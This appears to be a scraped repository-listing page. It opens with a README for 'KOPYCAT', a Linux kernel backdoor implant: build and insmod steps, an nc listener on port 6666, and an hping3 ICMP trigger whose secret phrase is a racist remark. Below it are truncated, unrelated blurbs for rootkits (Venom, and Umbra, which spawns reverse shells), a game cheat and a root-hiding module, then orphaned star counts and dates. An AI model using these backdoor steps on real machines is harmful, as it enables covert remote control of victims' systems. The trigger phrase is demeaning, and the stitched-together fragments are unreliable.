KOPYCAT - Linux Kernel module-less implant (backdoor)
$ make
$ sudo insmod kopycat.ko
insmod: ERROR: could not insert module kopycat.ko: Inappropriate ioctl for device
$ lsmod | grep kopycat
$ cat /proc/modules | grep kopycat
Launch nc listener:
$ nc -l 6666
Trigger the backdoor by sending ICMP packet with secret phrase:
$ sudo hping3 -c 1 -j -1 -e black-wives-are-fatter 127.0.0.1
2021
Linux kernel ============ This file was moved to Documentation/admin-guide/README.rst Please notice that there are several guides for kernel develop
Vulnerable Kext A WIP (work-in progress) "Vulnerable by Design" kext for iOS/macOS to play/learn with *OS kernel exploitation Usage Documentation can
BSOD Survivor Tired of always telling yourself when you got a BSOD that what if I could just return to the caller function which caused the BSOD, and
Windows kernel hacking framework, driver template, hypervisor and API written on C++
NT内核导出以及未导出函数-全局变量偏移速查 Quick check of NT kernel exported&unexported functions/global variable offset System目录下有已经完成的偏移 可以在线速查 There are already comple
Venom RootKit A simple windows rootkit that I have wrote, In order to explore a bit about the world of rootkits and windows kernel in general. The Ven
Universal toolchain Low-effort cross-compiling for the masses. What's Universal toolchain? It's a collection of sysroots and shell scripts in such a w
Orbit, the Open Runtime Binary Instrumentation Tool, is a standalone C/C++ profiler for Windows and Linux. Its main purpose is to help developers visualize the execution flow of a complex application.
Atomically exchange two files in Linux.
Umbra Umbra (/ˈʌmbrə/) is an experimental LKM rootkit for kernels 4.x and 5.x (up to 5.7) which opens a network backdoor that spawns reverse shells to
singlefile This is a featured CS:GO internal cheat written in less than 1000 lines, and in one C++ file. I encourage you to submit feature suggestions
A V module for asynchronously watching for file changes in a directory. The module is essentially a wrapper for septag/dmon. It works for Windows, macOS and Linux.
Where Am I? A drop-in two files library to locate the current executable and the current module on the file system. Supported platforms: Windows Linux
fake-linker Chinese document click here Project description Modify Android linker to provide loading module and plt hook features.Please check the det
Riru-IsolatedMagiskHider Background Many applications now detect Magisk for security, Magisk provided "Magisk Hide" to prevent detection, but isolated
Your First Module This guide will look at writing a complete module, with many common features in a reduced form. This includes the module initialisat
Path Module For C File name and extension parsing functionality are removed because it's difficult to distinguish between a hidden dir (ex: .git) and
Zinit Module Motivation The module is a binary Zsh module (think about zmodload Zsh command, it's that topic) which transparently and automatically co
CMake AST Status Travis CI (Ubuntu) AppVeyor (Windows) Coverage PyPI Licence cmake-ast has been tested against every single CMake module that ships wi
25 Jan 14, 2022
221 Dec 11, 2022
159 Dec 21, 2022
1.3k Jan 4, 2023
71 Dec 29, 2022
64 Oct 9, 2022
67 Jan 5, 2023
3k Dec 30, 2022
9 Aug 4, 2022
93 Dec 10, 2022
49 Dec 21, 2022
18 Dec 14, 2022
382 Dec 27, 2022
216 Jan 4, 2023
562 Jan 3, 2023
16 Jun 3, 2021
3 Feb 25, 2022
13 Dec 25, 2022
29 Sep 14, 2022